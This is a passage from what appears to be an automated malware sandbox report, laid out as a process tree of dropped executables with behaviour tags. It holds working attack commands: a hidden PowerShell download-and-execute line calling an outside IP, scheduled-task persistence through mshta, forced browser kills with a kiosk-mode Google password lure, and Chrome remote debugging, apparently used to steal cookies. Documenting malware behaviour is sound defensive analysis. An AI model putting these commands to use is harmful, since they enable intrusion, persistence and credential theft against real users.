        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1980,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2544 /prefetch:8
        7⤵
        
        PID:432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2912
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:2732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4612 /prefetch:8
        7⤵
        
        PID:4352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,8579894660860886152,10182080754194474262,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:8
        7⤵
        
        PID:4752
      - C:\Users\Admin\AppData\Local\Temp\service123.exe
        
        "C:\Users\Admin\AppData\Local\Temp\service123.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:432
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2464
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 912 -s 1288
        6⤵
        Program crash
        
        PID:2024
    - - C:\Users\Admin\AppData\Local\Temp\10009650101\5f4850135f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10009650101\5f4850135f.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:1628
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:1704
- - C:\Users\Admin\AppData\Local\Temp\1089276001\f2af1d7928.exe
    "C:\Users\Admin\AppData\Local\Temp\1089276001\f2af1d7928.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4992
- - C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2256
- - C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
    "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:556
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff80a42cc40,0x7ff80a42cc4c,0x7ff80a42cc58
        6⤵
        
        PID:4228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
        6⤵
        
        PID:2468
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:3
        6⤵
        
        PID:4652
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2160,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2568 /prefetch:8
        6⤵
        
        PID:736
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3672
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:868
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3616,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4440 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4184
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4472,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4380 /prefetch:8
        6⤵
        
        PID:3608
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8
        6⤵
        
        PID:3624
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4620,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4736 /prefetch:8
        6⤵
        
        PID:2616
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,13096566868853799968,14805856755536673503,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:8
        6⤵
        
        PID:972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 956
      4⤵
      Program crash
      PID:736
- - C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1089280001\dzvh4HC.exe"
    3⤵
    - Executes dropped EXE
    PID:4000
- - C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe
      "C:\Users\Admin\AppData\Local\Temp\1089281001\Bjkm5hE.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 968
      4⤵
      Program crash
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
    "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe
      "C:\Users\Admin\AppData\Local\Temp\1089284001\f3Ypd8O.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4652
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4320 -s 800
      4⤵
      Program crash
      PID:1920
- - C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089285001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\1089286001\d7cec70240.exe
    "C:\Users\Admin\AppData\Local\Temp\1089286001\d7cec70240.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:724
- - C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
    "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
      "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
      4⤵
      Executes dropped EXE
      PID:2016
  - - C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe
      "C:\Users\Admin\AppData\Local\Temp\1089287001\NL58452.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:880
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 796
      4⤵
      Program crash
      PID:2236
- - C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe
    "C:\Users\Admin\AppData\Local\Temp\1089288001\sQ3DZPU.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
  - - C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
      "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      PID:4244
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:09 /du 23:59 /sc daily /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:640
- - C:\Users\Admin\AppData\Local\Temp\1089289001\06fe742185.exe
    "C:\Users\Admin\AppData\Local\Temp\1089289001\06fe742185.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:400
- - C:\Users\Admin\AppData\Local\Temp\1089290001\e954955770.exe
    "C:\Users\Admin\AppData\Local\Temp\1089290001\e954955770.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:184
- - C:\Users\Admin\AppData\Local\Temp\1089291001\aca90f55db.exe
    "C:\Users\Admin\AppData\Local\Temp\1089291001\aca90f55db.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:920
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5512
- - C:\Users\Admin\AppData\Local\Temp\1089292001\8be69e5da4.exe
    "C:\Users\Admin\AppData\Local\Temp\1089292001\8be69e5da4.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3684
- - C:\Users\Admin\AppData\Local\Temp\1089293001\6ff8aa0de2.exe
    "C:\Users\Admin\AppData\Local\Temp\1089293001\6ff8aa0de2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\1089294001\5ea96f5877.exe
    "C:\Users\Admin\AppData\Local\Temp\1089294001\5ea96f5877.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\1089295001\d2d2d358d6.exe
    "C:\Users\Admin\AppData\Local\Temp\1089295001\d2d2d358d6.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1348
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3148
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:736
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:4176
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1256
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c39af2d-b5da-468c-b7e9-1da88a2d6fb4} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" gpu
        6⤵
        
        PID:3648
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f07fe89-1edd-471a-bbf6-59039e712602} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" socket
        6⤵
        
        PID:4092
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3208 -childID 1 -isForBrowser -prefsHandle 2880 -prefMapHandle 2840 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3608491d-773a-4232-9d5e-9ab814324967} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" tab
        6⤵
        
        PID:1676
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3948 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3196 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {df1e1251-aea2-4a85-bcd7-b3ce50cb647c} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" tab
        6⤵
        
        PID:2516
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4756 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4752 -prefMapHandle 4748 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3207856a-fc3e-4551-a8ed-bc4622ed5232} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" utility
        6⤵
        Checks processor information in registry
        
        PID:1196
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5196 -childID 3 -isForBrowser -prefsHandle 5188 -prefMapHandle 5108 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b93ecaf8-ca3e-4bde-9ed5-b6d55ea78f23} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" tab
        6⤵
        
        PID:6112
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5428 -prefMapHandle 5424 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3abc48d-6dca-456a-b721-a5acb77e3e16} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" tab
        6⤵
        
        PID:6124
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 5 -isForBrowser -prefsHandle 5564 -prefMapHandle 5540 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1196 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02ae546a-ead9-42ad-a900-93fba785595a} 1256 "\\.\pipe\gecko-crash-server-pipe.1256" tab
        6⤵
        
        PID:6140
- - C:\Users\Admin\AppData\Local\Temp\1089296001\5e3f33cac2.exe
    "C:\Users\Admin\AppData\Local\Temp\1089296001\5e3f33cac2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1128
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn o3O5Wmazc8n /tr "mshta C:\Users\Admin\AppData\Local\Temp\Lcdcgm6Ys.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4420
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn o3O5Wmazc8n /tr "mshta C:\Users\Admin\AppData\Local\Temp\Lcdcgm6Ys.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1976
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\Lcdcgm6Ys.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:1920
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'G7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2832
      - C:\Users\Admin\AppData\Local\TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE
        
        "C:\Users\Admin\AppData\Local\TempG7Z2QQMGPW3QVAVLK4JVLARPY4MMNXCX.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5584
- - C:\Users\Admin\AppData\Local\Temp\1089297001\5412289161.exe
    "C:\Users\Admin\AppData\Local\Temp\1089297001\5412289161.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5252
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6008
- - C:\Users\Admin\AppData\Local\Temp\1089298001\d9b3cb7467.exe
    "C:\Users\Admin\AppData\Local\Temp\1089298001\d9b3cb7467.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3160
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2464 -ip 2464
1⤵
PID:1776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 412 -ip 412
1⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 316 -ip 316
1⤵
PID:1164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5096 -ip 5096
1⤵
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2824 -ip 2824
1⤵
PID:2232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4320 -ip 4320
1⤵
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2484 -ip 2484
1⤵
PID:4972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4352 -ip 4352
1⤵
PID:5092

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3008

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2824 -ip 2824
1⤵
PID:2620

C:\Windows\system32\svchost.exe
